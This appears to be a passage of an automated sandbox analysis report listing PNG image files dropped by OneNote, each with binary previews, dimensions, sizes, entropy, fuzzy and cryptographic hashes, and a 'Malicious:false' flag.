                                                                                                                                                                                                                  Preview:.PNG........IHDR.......Y.....2.h.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].LTW.f..O.a.......*.....k...M.Z.n.q.h....ht.f.M.n.6..t.h.k.h5.6][[....X..p...?..g.`..7.o..of....^.ys..{.{...s.UMMM.(.l.@.l..R?.......(0+0.......5...*.F..#.].........1.....B[>[..a..L.....x...0.5t.v..S.h!.........Y....B..&.......f#.w5u...............0...x.sC....a.4j5V..Z..n....K..>...3t..wm..3hB.BD.P..FkcJ6.....O........7...S.........6..P.]mf.+o....w..<.......Y..Z.whd.....*zf+.....#."_?....`.._... qf+.?.?"k...zgME..j..!.k.U*.....&z..N....ma.......R.{.r0.S..KP..fU....g~..=..Q.n.*.* 8T=/'9,*.KDW...GN;0(P3_....1......'.;..;|.L.a.&<*\.d......o...Y... {E.F..}.e.\..=W..#..W....c./~..b.EWXI.#.''&.........:....X...b.....+2...5..6+)we~ja:lZ.d.Ey....l.2.5r........!.!._|.A.....j2.5.o.....WOM....V......GC9..'.... ....C..,._...cS....b.1.....t.........._........a.3..K..>V.f]...~....K...-........#.o.Y.P........a.7..,#..'s...T.....b..]..3..dPPP..Y.i...c.b
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 340 x 79, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):4490
                                                                                                                                                                                                                  Entropy (8bit):7.928016176674318
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:96:WXKr7Xwf6Obg+XaGOnsjbbGSb+ydWtRvEOhDE6XqPeosv02tR45boo:3rTUgXZnsHKSb+n+8DdKlwm
                                                                                                                                                                                                                  MD5:7F161B19B937AB48D4FD2F6E5E16FDBD
                                                                                                                                                                                                                  SHA1:BDCE4F1C73E87E609A7FDF245A512CA4F73B35B9
                                                                                                                                                                                                                  SHA-256:C863C5E71D1116D69561BD0637F4FE4C4240E9CED05B8A5B056073AD13E6495D
                                                                                                                                                                                                                  SHA-512:E915B76FAAC9512D2AD11CF4E4530A19BEA1C7D8508BC218C69CB041F1EEABA3E2E03B1D56E61B032A6418829752C21B8354AF1335466D7E1528A06E6742A461
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR...T...O.....;.......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..p.U..'...rD.WX.... Q.. ....."$.ZHP.Z...C...........R..%G8R..... .R.C6..A.b...0...^...#..g..........z2.....nB...l..X.&._.a,...a,...a,...a,...a,._.73'N..ukeee.6mZ.n.m.G.}...n...a.9s.DGG....y...8??.o.pE1....Y.,......).ca.i.M.:5$$.........Lr...ye........6...8...z.-r....d.(.xc..U..^11...._>.QX..y..2...T...sss1..."A.?_.;w..S.F>......4.G.......D.|...@.K...............C...k...P...q....6.`QQEE................7;;;.._\q.k.|...\.z..6j>..n....Y.&G*.n.S$))).....r........}.{[Dv:,..w..A...`..........a.~.N.f.s...P...*..'7n....eK....+.n;:.W..C..9}..O..D.q..X..5i.s~en.c..F&..?.....l.]3r...W`..#..7o..R.@^..*...W..?}t...{.B.8..D...UPa..~..C...|.C].a.9..R...c.Y0..9.u...d...C.......X.U....WK.....5...'..PM.`...<. ._.z.F^^.EH.K>_.0.d..S...Yj<..~.5.?l.fZ0.@d.....*..G...K.....e...b.|e..Q.4.....('z...!G.....2..XQx\......X...2.\h..X~.e....Z....=....C.1.......w.....d.z.
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 59 x 61, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):2210
                                                                                                                                                                                                                  Entropy (8bit):7.86853667196985
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:naUvGemgl0W5KMDRLEbGAnaHC7ew/fkDSCcE5FTaHWc:aerVlDRIewkXlrTa2c
                                                                                                                                                                                                                  MD5:73E38124F94AD20A2F1571FBBE11AEEC
                                                                                                                                                                                                                  SHA1:87FB8056DC7A0A3B70D51426771C4CCE2099CFE5
                                                                                                                                                                                                                  SHA-256:A700B63B30CBBE5230CC5E977D651E178EA87E73EAB18C8D5FFB1362149ADDF7
                                                                                                                                                                                                                  SHA-512:320FCE64DD6F975384BEC9267348CD5CD24A55B13BB09FEF1238C2216AD8ECABDCCC15601A079CE092ACFA4954829FFEB06FBB0631F6AE26E3A39E43C102048B
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR...;...=.............sRGB.........gAMA......a.....pHYs..........o.d...7IDAThC.yL.w...r..r....... ...Eq.nnN..i..[.e...-.d.M.dn...x.xmQAT.Q.RN9..EA.k..P`..=}..m.&~............oy....k...}}x..[....g59.}]...~i.SY......."....7Ow../......2...3f)n{..R..R......U?......O.{....c..pT.\.t....5.07.. .....07...7.o..,+.,.V.c...&..%.3I.....:v..\....6.....??..[.N...........nz..Z.B.........v.prs.q1V1|..=':..`.bz..%s.cf.3..RyMNUeV..J.k.}D[~xo..d..c...sO.y\....B...c.07......Rp..J.......{b.......;u...s....N.gko.M...;6...6..c.X5.S..o..\....^).....(......y.72.^....s%...[.q!&Z....C-..+o.....I.....,Y.{......g.1.0..I}.....<.....T..}....t.!x&)..[.7....4.5..{....n.<...#I...:.....r.wW~..zr..9k.^.]KR.*W.J.n.")....%0...)...Fbb5`4'.X..E.../.t.&,t(...@9....\$..........].P..jdU......H;.$.'%}.l7........y..$.....Z..4.Cm.u#&.%N..1..+..8....y...U.(.T.....}.I..5r}...!..K....>f..3.C.G..X1.(<.Gb..b(....0Qv0F.......n.z.s.Y......\.,.h%1...QU..%.}B|CW......sO..\.=..&3...,.
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):14553
                                                                                                                                                                                                                  Entropy (8bit):7.951135681293377
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:384:EF7aDrPYJ1n3kaEf61xD+KvdokCixTQm7QA96dNT:EF7a/PMeaEf61lT6kCiFQCQq6zT
                                                                                                                                                                                                                  MD5:3E9F7D399DF9CAD3669B7A5445EF7074
                                                                                                                                                                                                                  SHA1:2FBC965DC03EF9203581F595E0D7AB1734726ED7
                                                                                                                                                                                                                  SHA-256:76C80E31F37248C3C787F7972A7B22038390F9D81E72E650071A6F36D36AF27A
                                                                                                                                                                                                                  SHA-512:326F8F9CBF829BF80AAA96062A57255A36EE04DE310634327AA075D14129CFA8E36E48AB2A00B10F9BDC1D94F1AC7A9E41D0D063361920A0332EC124BDF4C3EE
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..8nIDATx^..xT...!=!$..%t..H.tP:.HQP@E,...QQ.^.....* E.(" ]:.K..R......p..n.9{...sv.}.....7.....o..z...,|.......M +.....w........O...>.SJ.O...<...{. .x..g..I..H.......V .. .}.PO..H+$@.$@=.=@.$@.......VH..H.z.{..H...!@=.#...............C.z..GZ!.. ..)... .....T...B.$@..S..$@.$....>.i..H......H..H@...S}8......POy......>....p... ...... .. .}.PO..H+$@.$@=.=@.$@.......VH..H..zz?.......$@.$`i......c;.n..i...0..........<......S....w..c.....y..F4.p..3~..|.]....s.6[..H...N@.=M..|`...3./...I.....'..|..K...r|...nX...'.. .G...ib|...MY8|......9x..Ur'.. ._ .....5..H..d..L.$@..I..o.;kM.$.?........K/.wn......Y....E..%K*.=.......Y.3.!k....[V..WG/?i..H..." T.,z...6h.[..-%9....WMY...z.vH..H@/.BOe....g-P.@.......lH.O...SJ}5.|....?.^..5^}..$.. .....S.@...*<.gJT/......_.R.C.....rj..Cg'\K........K....~Y....l@..)..l.k.s..Yr.....Z]jG..q.+..G...;lNJj.}..T1&&.. .....?...|....W<{...g.&'Ca
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 165 x 131, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):3879
                                                                                                                                                                                                                  Entropy (8bit):7.9281351307465044
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:96:k1hccap27HGVhY2Kn+A3RS+HG3dXrjmg26vh:k1hccewIhYxRmR5
                                                                                                                                                                                                                  MD5:C451B2A146BDD7EF33AB3EA27268796D
                                                                                                                                                                                                                  SHA1:C040BA2F31342CBCBF597C96D4D6EDB83D473B77
                                                                                                                                                                                                                  SHA-256:4C264B2A6E88712234DAA8E3A8D630CBF4EEB338554CB0B794D8031F8943EE65
                                                                                                                                                                                                                  SHA-512:55915A304B261BC6F38F5CFE0389D5195F85FE2C1DA325019C3AA391E8B1773091E078A35BD57F8CEE0BA035956382AE33790EF462053FCE711EEA9665B7F917
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.............c.L.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].p.U..g..Bp!...\.!.`pA.+....H.U..."Z..*U.. ..P.D.-.$..,,..$.g.......CB.l......I.g.pc..Lf..~.=.~]S.....w.9..w..'...!L..A ..^.t...v..s4&&&%%..6..`..:.G.D@.7.qS...K....[..,...o...p..2.%..B.Y....|;..gy+.[..,...o...p..2.%..B.Y....|;..gy+.[..,...og...}.W..z\?...y..;_t....=..e\.....6.M|[...B._....[_.\^Pf.....f.....\l..../6....<S.4./..m.......l....B'.n...O...yc...........X...P...k....t..9tf.g>....e..Sy'.L+**.]{..a...,7...p..+......K..y.9p...I{..i58....v..5.`Op.....{.......8.._.S.........p..).........;.....y...2...b.[>gP....C..G.H...........Osp...)..9x!...W.,..^....$r.p.sOJ.l..=.x.9s&:..........h.`..W"V..|.l{..72.....zv@.#.<.........../....F|...c...4.W....:uj@1...~.X............^si....Z..I~.Q.<.....NAOq...+i`.)...$L..gV.6#.....F$..hD.g.L-\..H._.u..]4......h...T.BK\\.Z222....7))..h...1??...~.-i=...X...~h....y[.............p.....x....c...{....Uh.7n.....
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 454 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):8184
                                                                                                                                                                                                                  Entropy (8bit):7.807848176906598
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:192:ExqMHYnnEnntvA4Mesu3SXHycmfIEFQp1r/:E0MGEn29esuiXHt0FQp1
                                                                                                                                                                                                                  MD5:5B386BF9A20766956A84F67F913F23D7
                                                                                                                                                                                                                  SHA1:6E72E51F5B4FA64E52D2B80B41409B3DB927A3C7
                                                                                                                                                                                                                  SHA-256:DDF6A1D5B29BD69C65A148B1247FDE8389CC56865E4398E4CBDCBD68A6555043
                                                                                                                                                                                                                  SHA-512:99B4109439D9A688D7747C6847E0FF7399CDA01A89C3181789F913E757A82EE4727F95E506F4B01930EFC7C6E229B94BB89E385B56BC009AB5CFE332585660C5
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.............s>.Q....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^...]...!.......!.YTP.A......-..r..$.E.J.I;....T.M.UE[..Q..x....wKB=.m...4.%..|:...9...\{..o.3..g.o~..~s...k...X.r....... ..@Gggg.?.... P_.]]]..*Iu....C...h..$...:... ..... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A...@R.. ....#...C.#.@..H*... ..`...`(q...@.I..... ......%. ... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A...@R.. ....#...C.#.@..H*... ..`...`(q...@.I..... ......%. ... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A..............W_...1c.l..6..`...@ ..I.S..I.I'...5.\..;....'1. ...........c..k.u.Qs..}..g#b.j.@..Y..QR...n.!...-......h..Z.......Xw.U.~q... ..@.%.'............. P..E.T.b.:j.(F..p.... .C.}3.'.|..z..w.a.....\{.:.4[.lY..~...x..'/....g....J..9.K_...'...:..;)......SO=u..E... Py.qf..}O7.o....u?:....6~~..9...?7.
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 167 x 92, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):4181
                                                                                                                                                                                                                  Entropy (8bit):7.943341403425058
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:96:b6JWqvCl45Da8kuGzhRwZvwIutfij19MQ8EpW14LBGJVCq:b6JTCl45DalsBws1R8914V5q
                                                                                                                                                                                                                  MD5:817D5A35EDB2B0E052194D4F49FDA19C
                                                                                                                                                                                                                  SHA1:FA6CB2016C5F43B76102B63D60359139227E07EA
                                                                                                                                                                                                                  SHA-256:0A87B8418B7F8E6E117BADDA11D7CDD38B8B7320C6BA3D3E9AF93EB9ACB2CE14
                                                                                                                                                                                                                  SHA-512:E0686BDBFC589401F0EAAE2B1598199EFA285F8392742B1C928B9274088804B23DCB584B6FEF68CE6D7E54DFF9C10338104F4C0F3F80A04471F0B2E8F9935CC0
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......\......!2a....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]iPTW..iv..D.....%DQ#A$...d..h,.T~..+...TM\cj*.)k.fj~L~$...L&...,...:.FdU..f_......._.n.m.....q.s.9.=..w.9......$..b.*..%....@A]A..%..<......l.h.+../..OSe.....]...>..C........^cCy.0nz.4<......g..?~..>.1ws.B....07W65.74T....=..v.......D....6.....tR....}]}....4z..^....7..;.."......^.....|=.#.=.32..o.<.Tn*Q....g.zN...n*...!/.........!....F..]...6...m...CX..~...+..U...E.|.........7]=rE?i(..$`e.%.`.....w._.Y...l.1...@....t.P..=.}..*...N...N.|.xS.5&.....Pe......Z.Z^XJkx.....^.....?7..._....Wsz......}G..]...\.....,[.y....}.J....'.R?a...G5..l.i.?....MH..l.DC^._.c.m.....%{;z.&.*+x;...S.....zxyH..`.._]...el^........U.T..^..p..z[.6(2x..,#;o##..}Zv|Z..............V.....0}Z....]..m.....x..).k]&e.._.W!Vry..%...I..d..}w.....^..\............m[.^.3r.......-8......j....>...Q..T..{\V\ptH.?........1..w....FHl...x.....\.`.ei.w..)`...g..V{..Z.....8..........o.._..
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 220 x 170, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):7374
                                                                                                                                                                                                                  Entropy (8bit):7.955141875077912
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:192:IfGsPejaVZWzIZKpnFFt0HK5+2Y/SLopWR:IusPe278IZKpnzt0q5+qVR
                                                                                                                                                                                                                  MD5:70DAF02EC717AB54452FA4C707BCAC74
                                                                                                                                                                                                                  SHA1:30F46FAC5E96470848C5A948162CC12455A05154
                                                                                                                                                                                                                  SHA-256:58469BA93EA36498FF9864EB54713A001C52106DE97804506D82EE24B816712B
                                                                                                                                                                                                                  SHA-512:E599FDC22A32CFEDBB23EECEAE0B278EAB9A90959FE6ACB40E2B201E45A7C19261AAF529E7A0D9CAF2A9A4C64C7831343F3BC20810513990AD5D38A32741564F
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.............IC......sRGB.........gAMA......a.....pHYs..........o.d...cIDATx^..S[Y..I...B..`...N....t.q..j...+LU.....O..sF.!.I...w@..H.Q.w. ...s..{B.....2......i..q..z{.}^..............J.fQ.....r.\WWw.T....amt.t;...6\N.........z.n...].u.z..Q...?^........;;;;:NO.}.c....<-...........({.^....t.k...F..[m..:........R2...%.y.l^OOONN8)....\y....}...}}.}.Hy6.^.a.....\...!S....K..|>......s.........l..P...LFWW.l..RK..b.h.h .3.F..|.|..~..........e.aa.........0H...<.Y.a`..xA!...7.X....xd=........h?o5........Ay....?6...........*..tb.9.*j...S`](.,P...9.2j..?...z3wD.[......L3.Ng2G|.......&..0ZK1u8.H.2...Z../..P(....BA..aL|..a.Y:.....J...5^x..'.\..&S...L..U..;....<{..."..@x ....J.N...;....WIht.<..B......!HM...&z&..6u..hF..G.D..B..........A.....n...GG...,.,.Q....X,`"....r.........3d.{o.(/...3.H...x:sX....h.8... ....r <..DB. ...y.N...o....5.......L&w....v....w..D......!.a4...."8.U.|.0m.(..zR>..=.+.L.....e....Yd2.-Z.7..D"..pX.I.....e5qYa._&..3..J..++
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 340 x 79, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):4490
                                                                                                                                                                                                                  Entropy (8bit):7.928016176674318
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:96:WXKr7Xwf6Obg+XaGOnsjbbGSb+ydWtRvEOhDE6XqPeosv02tR45boo:3rTUgXZnsHKSb+n+8DdKlwm
                                                                                                                                                                                                                  MD5:7F161B19B937AB48D4FD2F6E5E16FDBD
                                                                                                                                                                                                                  SHA1:BDCE4F1C73E87E609A7FDF245A512CA4F73B35B9
                                                                                                                                                                                                                  SHA-256:C863C5E71D1116D69561BD0637F4FE4C4240E9CED05B8A5B056073AD13E6495D
                                                                                                                                                                                                                  SHA-512:E915B76FAAC9512D2AD11CF4E4530A19BEA1C7D8508BC218C69CB041F1EEABA3E2E03B1D56E61B032A6418829752C21B8354AF1335466D7E1528A06E6742A461
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR...T...O.....;.......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..p.U..'...rD.WX.... Q.. ....."$.ZHP.Z...C...........R..%G8R..... .R.C6..A.b...0...^...#..g..........z2.....nB...l..X.&._.a,...a,...a,...a,...a,._.73'N..ukeee.6mZ.n.m.G.}...n...a.9s.DGG....y...8??.o.pE1....Y.,......).ca.i.M.:5$$.........Lr...ye........6...8...z.-r....d.(.xc..U..^11...._>.QX..y..2...T...sss1..."A.?_.;w..S.F>......4.G.......D.|...@.K...............C...k...P...q....6.`QQEE................7;;;.._\q.k.|...\.z..6j>..n....Y.&G*.n.S$))).....r........}.{[Dv:,..w..A...`..........a.~.N.f.s...P...*..'7n....eK....+.n;:.W..C..9}..O..D.q..X..5i.s~en.c..F&..?.....l.]3r...W`..#..7o..R.@^..*...W..?}t...{.B.8..D...UPa..~..C...|.C].a.9..R...c.Y0..9.u...d...C.......X.U....WK.....5...'..PM.`...<. ._.z.F^^.EH.K>_.0.d..S...Yj<..~.5.?l.fZ0.@d.....*..G...K.....e...b.|e..Q.4.....('z...!G.....2..XQx\......X...2.\h..X~.e....Z....=....C.1.......w.....d.z.
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1604
                                                                                                                                                                                                                  Entropy (8bit):7.814570704154439
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                                                                                                                                  MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                                                                                                                                  SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                                                                                                                                  SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                                                                                                                                  SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):11332
                                                                                                                                                                                                                  Entropy (8bit):7.9324721568775285
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:192:vpXZavBpl00n1Pt7JquG9GYHDK/5cxektxMQjcie9ZZkx30eXJIb8FKRN:vpZaDyc1P1Je9G62/5clpjre9nQkeXJY
                                                                                                                                                                                                                  MD5:31579CA3352DF8FA4E3E7F48C7CDF672
                                                                                                                                                                                                                  SHA1:AA682A3C781BF8EE43B5EDC9718E64CB79135F25
                                                                                                                                                                                                                  SHA-256:B0E7824BEE2C896279457D87E61E902431BEB528D830524CC4DFAE126E89FC24
                                                                                                                                                                                                                  SHA-512:782FF9492E3ECB11C72D316DDD94D1F3E94CD908FC9452A37DA6CA30ABCFE9AB2BCCED8583A569DA68626BCEC730408AF86997E295637BF64AFF5BC768F3E309
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..+.IDATx^.{...u./-...&....6..+z..Q."b*. &M.d-e.*.. ....J..Z-T.Z$....R..F...%*`bn..<.....W.E ..w....^...;g..[w.5w.9g...3......t8t.P.?$@.$@.5...=.8qb.... ...5...a=...#.y. ...@B.....am. .. .......$@.$`.....G.B.$@..S... ...C.zj.#[!.. ..).......!@=..........}..H.........VH..H.z.>@.$@.v.PO.pd+$@.$@=e. .. .;...v8... ...................f.o_o{....~t...n.S.N..?..._..L;J.H ..,....7.}...|....7...b...|.........ObVa1. .?.X.....~.....t2..V>.b.}..0.F....%`GO7.n#~..F....K.~...FX..H.^....k.Z/.2v.W..M.<.;$...v.t..,UO.-]............D.....o.J..Y........5.%.l....{.....'O..dC$....=uks..;{x.,.N.=.."..Q]..w>.E.H........AV=...f.&. ..ip}._0.~[pf.`..9..v.W.,..2.E.$P........+...OcC.H..=..|..[..g%(h.....W...?...UDh..T$..?....|.]..)?[Wo.h.'..2P.1..!.......$.NO.5..}...c.;...~.x,|Q....B..6.@>..y..}...m...D~z....L#.0`_.`.s?|....I.....a...=N....c.._.2.._..6 .]...5....{.^>.lM..;n...k..9J..S.G..{.
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1604
                                                                                                                                                                                                                  Entropy (8bit):7.814570704154439
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                                                                                                                                  MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                                                                                                                                  SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                                                                                                                                  SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                                                                                                                                  SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 171 x 50, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):2270
                                                                                                                                                                                                                  Entropy (8bit):7.845368393313232
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:3Cxnazs22lovji2Ez2iqBU2C+hJWizJNzIu1coqAYClBeMsk1:3dm2Ez2iUhBzhyjAxqQ
                                                                                                                                                                                                                  MD5:6EFE6733E10E011FFDD6711B5F37C9E2
                                                                                                                                                                                                                  SHA1:C72549E824EAD899944A38C46FBC28BDCDAAD611
                                                                                                                                                                                                                  SHA-256:92B5056DAA03DF3EA85AF49FFE4F9CFE8699BDF3539576A99F02418FF49AD9CB
                                                                                                                                                                                                                  SHA-512:EC14B553A5780CD9B33D438CE13A6932DE43E346D8D2DEC8D093A6A2048675423948F8E2C604A73460980C3C68D9276B65D76C2A6BC7B24FDF10CA92FDA2583E
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......2............sRGB.........gAMA......a.....pHYs..........o.d...sIDATx^.\kL.W...*.F......@.*.(H4."iI}..B!.iD...I-....y.I.h.....<..1.....C..(XSy.l....,-,.......3..3...;.{...{.{g.....Q..x.T/q...F.V...B..'..?{:.:...`.........+.0s.e...w....{.`. ....5...d..9S]../............$Y.>.I....i..8....;,r8r!Ee'"..!*.&E.....n...=.@..Sp.GF..c*....1QH3....?,.T.el......t?..([Q`.0....k.G.....X..C...k|p...I.q;.d..N....c.u.a.5.%.k.fS\)..H..T.~l*k.[.n...x2.1...........%...yK..a..l.[.?#..fD%.FMT. =r.jt^..fT...c.&..Lr..............\..V.ll....Br^6..U27...O..N*..K.gm.K..g.;..l..Fe...w?..Q.E......0.........7...(.e..t...x.c6..Q..n.92:%....l..4.h]Z.....w..|..!.p.~..B.y..&.......gl...\.wI......G.6.K.$...%.-.h]\8.LT.....}{a...^.i......4.0.ji...........n.pk ......7t....U9..b...I.....#...<q..(|=F.......0@^......+..........X. .>p....S..t.].f.x.0....7d..n..'..'... .M.qqn...G.t8'.=..V.PK....K...X.z.#..I.....@...Y....BH..I.....,..K....=`&Z.41$..a'o.:....i{o
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 165 x 131, 8-bit/color RGB, non-interlaced
